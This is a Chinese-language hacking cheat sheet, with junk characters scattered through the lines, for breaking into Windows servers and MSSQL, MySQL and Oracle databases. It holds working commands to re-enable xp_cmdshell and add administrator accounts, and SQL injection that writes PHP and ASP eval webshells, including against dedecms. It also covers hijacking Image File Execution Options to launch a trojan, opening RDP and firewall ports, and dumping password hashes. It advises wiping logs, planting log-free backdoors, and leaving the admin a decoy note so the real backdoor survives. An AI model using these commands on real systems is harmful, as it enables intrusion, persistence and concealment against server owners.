, u" h7 H3 t+ d3 P1 l1 Z# d) i
1.net user administrator /passwordreq:no
( M9 v# g0 I. ~; {这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
" d3 h( {6 B# C1 Q2.比较巧妙的建克隆号的步骤
+ c$ [3 h" D4 q先建一个user的用户/ \! V# d& t$ O+ n
然后导出注册表。然后在计算机管理里删掉. \1 F K3 Z! }" m! r
在导入,在添加为管理员组3 O. X, X* \ e1 W
3.查radmin密码
8 J1 H& P9 T( z! I+ G1 ~3 g6 Nreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg5 _2 n% Y# L3 \- _5 d
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]# A" B! P# L" n: e4 }4 \
建立一个"services.exe"的项
! d$ V/ ]7 E# a; M再在其下面建立(字符串值)
; F% v) O% M- V7 t$ P9 W0 w/ c键值为mu ma的全路径
* e: X) F( }3 Z5 v& b% x5.runas /user:guest cmd$ x4 k" E* R6 k: h; G
测试用户权限!6 ^9 l, _" W0 V$ D1 P. [6 c
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?9 }0 K1 ]7 {! T5 j% @7 i* n, A$ x. _
7.入侵后漏洞修补、痕迹清理,后门置放:' c* k9 k- ?" s+ o7 V
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门( m- Y5 w$ @% D
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
+ R7 _4 Y# T( {) i8 O7 ]- l9 U; c! P
for example
/ P# |' J$ t3 a) `
0 C4 G4 Z" C( ^9 Kdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'- Y5 A. `, n* q. v C
1 [6 a) O: }3 Zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
$ p; u) }8 d9 |" B+ P1 Q0 z: g/ Y4 C
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了5 G5 O$ \1 O( I+ P; G
如果要启用的话就必须把他加到高级用户模式
+ K$ E; p8 ~" ^9 f; F$ S4 i可以直接在注入点那里直接注入5 c% z+ {2 `# l& \% S
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--/ s2 n; \, {" ^) {2 B" Y0 K
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--$ O2 G+ g, G3 a
或者# ?& a5 y' X) b
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'( U! T( P5 B# d* s1 Y
来恢复cmdshell。, D8 {, o/ m' o6 }
" b, {4 @# z' I5 e5 ^5 ]分析器
. Z, [% Z) ?* p/ [) s, aEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
4 E w, E) f1 Q5 { N; p9 G1 [2 n然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
) i! v4 H. ~9 }" x$ O10.xp_cmdshell新的恢复办法8 a8 `# i; f$ p+ T, p
xp_cmdshell新的恢复办法
$ I% v$ T) W5 q# Y- E扩展储存过程被删除以后可以有很简单的办法恢复:. _+ F' S$ T- U( o
删除
/ \; o3 R6 f1 d6 o4 y R& ~. ?drop procedure sp_addextendedproc0 s3 m' P4 Z: Y5 C% @
drop procedure sp_oacreate V- b6 W: M, w% I1 Y
exec sp_dropextendedproc 'xp_cmdshell': C' _- l" M! u: C8 C
! K0 A7 H6 b8 P1 F! W) J8 I: J
恢复 v( c. W7 y! s8 m: [% S% u( V6 Q
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
" E; R4 S, i3 i8 I$ _dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
1 c$ b# h5 l* @6 W- h1 W1 I& w, W4 O: V; q. c
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
8 m8 H1 _/ I* S) N7 D/ k2 ~% }* u" ?) B3 E! ^
-----------------------------& U4 I: D6 d/ \2 X% t
4 p3 C+ C) f7 }( h, K, n删除扩展存储过过程xp_cmdshell的语句:
; f) s5 g- t# V0 bexec sp_dropextendedproc 'xp_cmdshell'; [1 R2 q5 d# q/ q6 ~
- G4 c. z# g4 e
恢复cmdshell的sql语句
# C3 l# ~/ v* C* i4 A/ e9 L" Cexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
( W) r1 j; s1 w8 X! k \0 r4 y/ g* Z E2 k {' {
) n8 L' T5 }) x E' N& h开启cmdshell的sql语句5 G; X' d* d) ` B, v
0 \" l; }* g( e! Z, A* I/ w6 Y' r
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'' S7 ~, E! a8 G5 |# m0 G0 V
, u+ W- ?& V- v+ H" `# I' ^9 X( [: {
判断存储扩展是否存在3 S5 [+ o/ p0 @' F& ~4 A4 u
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'; c" J' v( t7 n7 p0 n: ^
返回结果为1就ok
4 y% h) C3 ?) t6 ~
2 D+ F' F2 h( c2 m' F: O0 j& [恢复xp_cmdshell. Y1 }0 O" N3 o2 j, t* L& Q
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'* L, ]" ]; m: ~6 e7 w
返回结果为1就ok$ {8 x7 }; E. X8 z5 q) z
/ W9 l/ u% k1 f3 m否则上传xplog7.0.dll
" D3 e' O# J( d0 [5 B( b) |/ C; G! d5 Eexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll': y' d, t( `2 k) b0 B% x- J/ c
( s5 v {0 B$ R6 q- F堵上cmdshell的sql语句7 Y( f) ]! E4 F2 o7 [0 N/ k
sp_dropextendedproc "xp_cmdshel
; o! R# f6 P6 L T) c- L-------------------------8 [8 _& C Z+ w4 n% }# X5 }. m; I
清除3389的登录记录用一条系统自带的命令:* P& O& S3 `0 \, _( B
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f! g0 H# V( D& x; g! g1 a, N# v
% V( h7 S& c/ c然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件' u- t6 ?' S/ T+ X) [
在 mysql里查看当前用户的权限2 g7 V/ X) O1 c3 v
show grants for + ]& a. k# U! _& a3 [" d* J" A
9 T: R7 R3 U8 B8 N$ P8 U7 \
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。 ]+ K; f4 C! c; k5 o* b! {
$ r2 Z6 s; y; V2 E; e- H5 ~/ p y/ j' B$ g6 {' N( L
Create USER 'itpro'@'%' IDENTIFIED BY '123';* P. z6 \8 [* O8 S: G" u# [
3 _1 y0 j! e- T1 h$ Z5 iGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
3 ?) X; B$ y5 f$ E( z6 k; R6 Y* i; T* W) `
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0" o; Z0 B# p8 I2 ]5 i; J9 L& k; {2 ?
! c, s: X. ~8 u) a$ s0 b
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;; d$ t6 G0 o' Q6 O' ^
2 O4 M6 V5 r0 N7 P6 c搞完事记得删除脚印哟。
. e4 h' i+ I% A4 D. V4 B9 b" \! u' Z
6 U. N- U& p% c7 w: J$ HDrop USER 'itpro'@'%';
* k* n1 E, K# B6 h+ g+ v" K. _9 Q1 T3 @1 g
Drop DATABASE IF EXISTS `itpro` ;
8 d, G8 }: k A/ b5 S# O6 L9 L3 H" b$ ~( g8 O" X
当前用户获取system权限) R- D9 O- ?2 [ H
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
, L6 a# i. P$ I/ e9 U9 Qsc start SuperCMD0 d: Z) ^7 e9 k2 K, v( N, R( x
程序代码
" ~+ z/ i1 g* h: ]$ t<SCRIPT LANGUAGE="VBScript">% u8 `7 U" y( G& s" \
set wsnetwork=CreateObject("WSCRIPT.NETWORK")2 ?, a( e8 o4 \; m
os="WinNT://"&wsnetwork.ComputerName
& A3 o w4 }$ J2 D9 {Set ob=GetObject(os)- K8 T0 R% r- E0 s* H
Set oe=GetObject(os&"/Administrators,group")1 i; @0 [8 y. _9 ^% E( k
Set od=ob.Create("user","nosec")" \ J$ d5 e! d7 n: ^$ F
od.SetPassword "123456abc!@#"3 Q! o+ F: M/ _* y
od.SetInfo' \0 {. n: q& l7 M; U+ c
Set of=GetObject(os&"/nosec",user)
6 f! O4 o; E; ]7 C2 i- ^oe.add os&"/nosec"
3 y; F! Q0 R. { u1 ?2 J</Script>
9 I( K# R( s% _7 L3 }0 j0 m! E<script language=javascript>window.close();</script>+ f6 x, d$ J( e& s/ a
; s/ z$ T0 \2 P. p( M
' L" k2 t( X+ F2 b- U
# s! r+ ]7 A; Z* N8 i4 O
1 Q8 }3 C T) ]: L6 Q9 l3 I突破验证码限制入后台拿shell( \ b/ N( F n
程序代码& n- r5 n' i0 L4 V
REGEDIT4
- G3 |8 S, h- B8 j[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
. Z0 |1 }4 x. ?* X" X"BlockXBM"=dword:00000000
+ u, V: h( u2 u" X b! h8 u0 U- ?( b1 N2 V4 B: T
保存为code.reg,导入注册表,重器IE" P( p3 b. g& }# j% Y5 e- }, N* E2 S
就可以了1 F" s& D2 r @- j) O
union写马% V. [. V( I0 k0 }: F( i/ J
程序代码: |1 i6 Y2 o0 @' C
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
# R3 j7 n. g! o8 ]5 Q$ E1 X8 g0 \" m
应用在dedecms注射漏洞上,无后台写马
1 X3 W$ F+ E5 ndedecms后台,无文件管理器,没有outfile权限的时候* H C9 D. b3 t/ z) I
在插件管理-病毒扫描里
; C4 F8 @0 _3 I! k2 p: z6 _写一句话进include/config_hand.php里
9 ?5 L; t; {/ [! T0 s: A程序代码
' {0 h* P7 X C$ F9 R8 @7 c>';?><?php @eval($_POST[cmd]);?>7 g# N+ E0 G% }$ P' E
5 ?$ @4 N* |' a" T
" K4 t3 S" Q* d) j+ K& R6 y如上格式5 ~3 L2 ~" a' _
! m, {4 ]) C+ ]' D2 q* E
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解" h! ~ }3 z k. n1 o
程序代码% ], u6 p" ~( ?' |" _
select username,password from dba_users;7 @7 ?- f% j& s6 f2 @ ~( R( o
4 d# q4 D% t% g# Q8 z: n: r) H
8 }9 e% u, M8 Q1 V4 b) M6 ?mysql远程连接用户
: k1 O1 Y* X# ^程序代码3 O" K4 m. ^( ~+ r; U
, q# B' C5 X! ^0 mCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';% {, G& {/ ~0 G2 {8 H2 W* T1 f7 k; G
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION9 k8 C* \' O# g' Q2 `
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0, X" i; l0 T2 R. v0 L/ o% H
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;& g- I: _" _. T8 n
6 D6 B- n- A* M4 a8 m2 ^9 e' C7 F
7 D8 |: k) B4 b/ b9 [) C
6 e' g5 m: N$ q$ c7 ^( f; Y5 p0 C1 |6 |; g% ]
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
0 X, ? Y/ o( C+ P! E
- B: o" g3 L- e" x* |7 q- n! Z1.查询终端端口
4 W; M6 r |# m& ]4 S( g! S4 y* F9 o6 e' V2 y
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber) Y2 M3 h* n: X
1 j9 R" ~6 o) N( J; y: |通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
5 {2 J0 i2 q; l% C7 A. u" atype tsp.reg. H( ]8 v5 v" @6 t0 w" t$ y
$ R' P- x, j, Y$ f( h/ e
2.开启XP&2003终端服务( E' X N1 ~0 }7 D; j5 |3 `$ |8 w
5 M' n5 X1 e! m! W5 h2 T+ [
& m; x3 K4 u9 R$ a; `) C- QREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f# @# B. D% h( d& g
: x( ~0 W+ |+ t
5 `% x9 T$ W5 M+ P6 p8 k
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
2 ] ~" f O' d! f2 G8 z8 d5 q
8 } u% H! W, g( P( X. A3.更改终端端口为20008(0x4E28)
8 J& ^! p+ [. Y7 s7 n; H& n# w; b
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f: H$ x( |; M$ h' B; m
5 A$ {9 N4 m2 N9 r9 G& E' Y) q$ @REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f$ E3 E1 ^- h1 v+ {8 d3 G: u
" }! [- n& N2 l V+ c4 V2 X4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
* X/ ~1 u/ L% r+ Z% e
2 N! K9 U# v, ~5 O3 kREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f) ~( g: t+ _% k+ E6 H; ~, a
E$ w, ?4 @& z2 g: a( x) R- Y
" E% i& d- @3 x' d: Y7 B
5.开启Win2000的终端,端口为3389(需重启)
! e1 x8 ^8 w8 S' Y, o2 p2 `7 p, ^- W+ F9 b
echo Windows Registry Editor Version 5.00 >2000.reg
+ K- ^! F3 S# Q) @& c: L( r/ x1 n% ^echo. >>2000.reg
8 ?6 C6 Q# Q3 Secho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
) r/ ]" y! W1 [2 A& }echo "Enabled"="0" >>2000.reg # ?& V1 J+ s. O1 v$ E: a6 B& z) y D
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg u6 P) y& M3 z' P' D9 |
echo "ShutdownWithoutLogon"="0" >>2000.reg
. N Y2 t' K% L. S0 kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg + x( K3 g3 h) O* C
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg 1 \' V5 u$ Q0 Y3 a9 u' J
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
$ m H9 f2 D1 T: [$ Mecho "TSEnabled"=dword:00000001 >>2000.reg
# b& A# }, n% r# S! f( f% U6 N7 Zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg . i- A! ` j% M; }" f0 M
echo "Start"=dword:00000002 >>2000.reg + S. }' D' o0 g8 J5 Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 3 A* q: [& ?: Q" E
echo "Start"=dword:00000002 >>2000.reg 0 O5 \9 f: E7 H8 a' v7 @
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg # G; a* m" X1 ?, q7 A
echo "Hotkey"="1" >>2000.reg 6 ]/ A. p0 J3 e6 V- d/ y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg ; E$ E6 V5 P+ l: M4 k
echo "ortNumber"=dword:00000D3D >>2000.reg
. l) z/ f) C4 t1 k# xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
# N! y {) ] S( _. L: c. W1 ? |echo "ortNumber"=dword:00000D3D >>2000.reg) B( j1 _2 I2 X
- ^$ v5 q1 M6 G k
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
! K; ]7 E5 W8 Z9 a& A y% `/ R/ A0 @8 H' g, |4 F/ q5 L, D. w
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf+ u! t; B: k# q+ k
(set inf=InstallHinfSection DefaultInstall); w0 p6 [! ~; |9 c7 n/ R( P
echo signature=$chicago$ >> restart.inf ?+ q% [! q* V9 O& q+ S" P5 o5 R
echo [defaultinstall] >> restart.inf" ^6 k% B; s0 v2 I7 h
rundll32 setupapi,%inf% 1 %temp%\restart.inf
# h. Q& O" y/ d1 p
x1 X% R% G5 D L: o
2 t ?; l `* W# J+ X7.禁用TCP/IP端口筛选 (需重启)
/ |7 O* L- A% U3 A
; }/ d8 e: s. k, r x5 OREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f7 P( D2 C3 a2 H' f& F
( ~8 R8 Z! S6 l% C( T
8.终端超出最大连接数时可用下面的命令来连接
" j6 A, t6 ?7 }9 j; l
: y$ \( l9 e$ X( J$ }mstsc /v:ip:3389 /console# K ~( e6 }; l" c
8 V& \1 Y5 h: Y# A, n, K9.调整NTFS分区权限- w, T9 U, L/ H) y) l3 p
& K2 a+ E' x- g8 ^- Ycacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
5 x. t) }5 c8 r4 r
4 s- ]- {6 @, @$ dcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
' H& I# D, o) W
2 G1 a% `$ |7 y- I( Y7 Q1 r+ X------------------------------------------------------8 N6 ~1 w8 a* ]5 X
3389.vbs ; r) g; }& S' i/ ^
On Error Resume Next9 b$ |6 w- n2 N( W# f9 N6 W
const HKEY_LOCAL_MACHINE = &H80000002
2 ^. B4 M; z# a1 W, Q, TstrComputer = "."
$ j8 G/ p# r; g# t7 U1 iSet StdOut = WScript.StdOut0 b4 I4 q2 A( G6 w# |( `$ s; K+ m! T
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
4 |. y! s0 A( |5 ^5 QstrComputer & "\root\default:StdRegProv")% [; F% j$ ], f: V0 ^ D! n' F2 {; W
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"* N2 t( s% g: y1 i
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
' o2 L; @4 G8 J; s' f% j2 X8 t+ Q* X PstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
9 `; I9 {# S4 Qoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath9 B2 ?( D/ s/ u
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"2 [, i" S- I& ~) D4 d
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
P( _- f( D& i7 astrValueName = "fDenyTSConnections"
7 k& p6 N5 h4 K' O. P! MdwValue = 04 I$ P. |0 s% l6 D* D
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue( l% Q- a& g+ ]8 A Z9 p- z {- }
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"6 T) [ Q& }# t5 H/ u' \
strValueName = "ortNumber"
7 b4 {3 ?) a$ F% _( M3 [+ a# V) x' QdwValue = 3389
4 ?: R8 K& l7 k; K/ X$ Woreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue" `: l! t3 x3 ^% K8 \4 f( k
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"0 u+ P7 x" n; Q
strValueName = "ortNumber"
: f4 `7 y/ J3 J. Y8 ^dwValue = 3389
$ F+ A9 ]) L$ z% Xoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
$ m- j5 ~! M5 T$ t+ `Set R = CreateObject("WScript.Shell")
+ v- N5 g2 Y5 }6 m) {R.run("Shutdown.exe -f -r -t 0")
. F1 L) T5 r3 n7 W' t; R6 h( _0 ], e/ z& Y8 q) q9 i, s2 Y% N
删除awgina.dll的注册表键值
- G$ g5 N; a' h$ @" P程序代码
b+ @: L S8 G0 v& D% l
7 E) E& E* I# \0 t: }2 greg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f0 I1 B- \4 Q- ]
5 y3 r& Z+ b" e* ]: F4 g2 N5 Y# V) {: U; |+ d
9 G1 B. Q8 S+ A1 @, V( p
, T' s' k' O+ c" _程序代码
$ v+ _* T/ A5 ] R* x; h1 xHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash# i2 m6 t0 s2 l$ R$ U( s
) C' o# s; o) l, w. b6 X
设置为1,关闭LM Hash1 X/ Q, R4 ?; o
] ]- |% L# {; e4 t# { G数据库安全:入侵Oracle数据库常用操作命令
! i9 O$ ?: ~! k/ E最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。5 b' j7 }, T; k4 W
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
0 Q9 M5 m0 E0 K3 N" m3 r2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
' \/ j7 Z1 s9 k6 q2 {3、SQL>connect / as sysdba ;(as sysoper)或
3 ?' T( D3 F1 c5 s+ Nconnect internal/oracle AS SYSDBA ;(scott/tiger)% b1 Q) p6 @1 S$ O1 o
conn sys/change_on_install as sysdba;
) t& r0 x% a f$ P$ Z7 X; E! W6 J4、SQL>startup; 启动数据库实例
/ c& X, g8 X% M6 }2 E5、查看当前的所有数据库: select * from v$database;+ G( P! [/ a! k0 c% G( i4 m, ~, t
select name from v$database;! _* F* U2 l8 Z: E8 R
6、desc v$databases; 查看数据库结构字段1 Y- C$ O: Q( R" j0 i
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:" _4 p" H: L- T) D7 ]' {# t
SQL>select * from V_$PWFILE_USERS;$ L; j7 T6 r7 x. S
Show user;查看当前数据库连接用户8 @; U( ~! n1 z! l% E; Z }
8、进入test数据库:database test;
6 J/ ]$ ~7 _% v. d9、查看所有的数据库实例:select * from v$instance;( z' i6 ^: f% m% J. s
如:ora9i
0 P3 g# D$ q4 K( o( A10、查看当前库的所有数据表:
$ `! C Z( n# q$ ASQL> select TABLE_NAME from all_tables;. I8 W5 ?# y2 T' N! C9 D
select * from all_tables;
8 w4 K6 A+ X/ L" P7 M" C& Y# a7 [. a6 mSQL> select table_name from all_tables where table_name like '%u%';. _. x v; B* R
TABLE_NAME
& p F. C* \4 l------------------------------
& x0 x+ `: N1 i- {_default_auditing_options_- v9 M+ S* ?7 g, S6 r" e" Y
11、查看表结构:desc all_tables;
) w0 p/ K4 X$ }+ N/ S12、显示CQI.T_BBS_XUSER的所有字段结构:
* `1 f0 \) D8 }5 v# w2 g2 j1 Sdesc CQI.T_BBS_XUSER;
1 r- U j& {" F* ?1 Z13、获得CQI.T_BBS_XUSER表中的记录:* G7 Q% Y0 r" }) D7 A
select * from CQI.T_BBS_XUSER;
$ D! W% ^; P( I) c14、增加数据库用户:(test11/test)
) r7 m) W) s2 ?% u$ x3 Rcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;. P% s7 |( Y- V
15、用户授权:
% Q( ~* W y: H8 Ygrant connect,resource,dba to test11;
0 @! R/ \0 s9 `$ z2 ?grant sysdba to test11;5 d: n/ G: F/ j9 ~# @4 M/ m3 N
commit;
& B2 [ j( ]: ~- u/ ^- n16、更改数据库用户的密码:(将sys与system的密码改为test.)
{, r8 m, {% _alter user sys indentified by test;, L! R x- w% ?* z7 |1 t: G5 X
alter user system indentified by test;4 h, R" R0 Q8 K) \. ]
8 K) D. L+ L# B \& ?. m. qapplicationContext-util.xml
" S' e! z/ x) g6 t W1 EapplicationContext.xml
0 ~3 ^& u* U' h, P0 estruts-config.xml" I8 x* S7 r2 o! u. N6 c" s
web.xml
+ s3 i4 x- b# y: x% q3 v# N9 bserver.xml
+ w$ `3 ?( I! Ptomcat-users.xml% p9 v- S9 s$ ]9 e
hibernate.cfg.xml
/ P; R( L2 _9 z f6 wdatabase_pool_config.xml. j- k0 p0 Y1 t$ _1 s' q) }4 I" Y
/ Q2 S( S& |0 k5 p. q; f: P; u1 O, \( K$ W3 x7 L
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
; ]: d1 G9 j9 Q- A( P9 J\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini% F" }' H. B% J A7 v7 n
\WEB-INF\struts-config.xml 文件目录结构
/ V9 d+ V* ]/ q! m1 ]9 Z i" [3 E9 z
( V: ?5 Y, w: O! Bspring.properties 里边包含hibernate.cfg.xml的名称
2 {* F6 v' V1 w d6 z- H4 _! k/ D
. l2 W0 o# y6 Z$ Z4 n1 V( D, N7 s# q4 S1 s( z$ `& S7 n
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
! |( J2 ^, _" W$ V; P* ?2 [2 ~' i9 l/ x' ?" D
如果都找不到 那就看看class文件吧。。
; V; Q9 F0 |5 y, g# B; I( G+ J
2 u6 [$ h. B7 J% y9 [( R测试1:9 p: {' ^5 F+ G. q
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
" e3 F# E. Z+ q
1 M, k4 b0 ~' u( ]1 G测试2:$ W/ \% {( `- {% J# G/ i5 \
: L+ K" ?/ k4 R1 }7 p$ p6 Xcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
9 d8 L3 x3 e, u( N! \" {6 w, K) h0 Y
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--( r. k( U. g* {# U5 A1 h
( H- p) q4 U9 TSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
7 w3 b3 l7 l' M, v2 g1 o% U5 p1 @1 ~; e% Y
查看虚拟机中的共享文件:
: }. k! w5 X: _在虚拟机中的cmd中执行0 B1 g( @1 d$ [# N1 `1 z
\\.host\Shared Folders8 ~3 n3 M3 D# n; ?4 \6 E9 u& w# a
, W* q' a2 G4 x' w0 i z* Vcmdshell下找终端的技巧
/ D! [1 k, q, W8 R/ i. N+ o. t找终端:
+ n s) V \. m' i4 ^& c3 C第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! ' l0 A3 {. k: ~
而终端所对应的服务名为:TermService
; c# A+ e) L) F% s" Z! y, p第二步:用netstat -ano命令,列出所有端口对应的PID值! + M7 p2 o5 u- a& U( @
找到PID值所对应的端口5 ?' |' J* w' X3 I7 e, N
( c4 e) `0 A# Z; M C
查询sql server 2005中的密码hash- P/ I- T6 K/ Q: t8 N0 ?
SELECT password_hash FROM sys.sql_logins where name='sa'
6 O$ [6 S* r0 u2 xSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
) K; c& |$ m2 c7 t6 @access中导出shell
! u/ x4 N) ?% Y; i
5 _5 b2 u; p" B4 N8 W6 q* [中文版本操作系统中针对mysql添加用户完整代码:, b/ n3 R; f: X0 y
! v3 j3 H8 C* S2 d+ q% }use test;
; Z& ?6 a" Z& b5 D! O" Fcreate table a (cmd text);4 x% U% U6 N5 m& H7 @9 |; F
